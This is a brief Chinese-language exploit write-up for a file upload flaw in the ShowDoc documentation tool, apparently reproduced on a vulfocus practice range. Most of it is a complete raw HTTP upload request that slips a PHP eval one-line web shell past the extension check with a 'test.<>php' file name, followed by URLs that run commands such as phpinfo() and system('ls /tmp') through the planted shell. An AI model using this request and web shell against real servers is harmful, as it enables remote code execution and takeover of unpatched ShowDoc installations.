showdoc 文件上传漏洞

  1. POST /index.php?s=/home/page/uploadImg HTTP/1.1
  2. Host: vulfocus.fofa.so:57700 
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
  4. Accept-Encoding: gzip, deflate
  5. Accept: */*
  6. Connection: close
  7. Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
  8. Content-Length: 265
  10. ----------------------------921378126371623762173617
  11. Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
  12. Content-Type: text/plain
  14. <?php echo '123_test';@eval($_POST[cmd])?>
  15. ----------------------------921378126371623762173617--

291989f83b5c4b6ca40a688fd0c0f267.png

上传get型一句话木马

ce8faa9addaf41aa970fadf620090f44.png

  1. http://vulfocus.fofa.so:57700//Public//Uploads//2021-11-15//61925ef4e09c5.php?cmd=phpinfo();
  2. http://vulfocus.fofa.so:57700//Public//Uploads//2021-11-15//61925ef4e09c5.php?cmd=system(“ls /tmp”);

复现

使用https://vulfocus.cn

image.png

上传一句话

image.png

上传成功

image.png

木马连接

image.png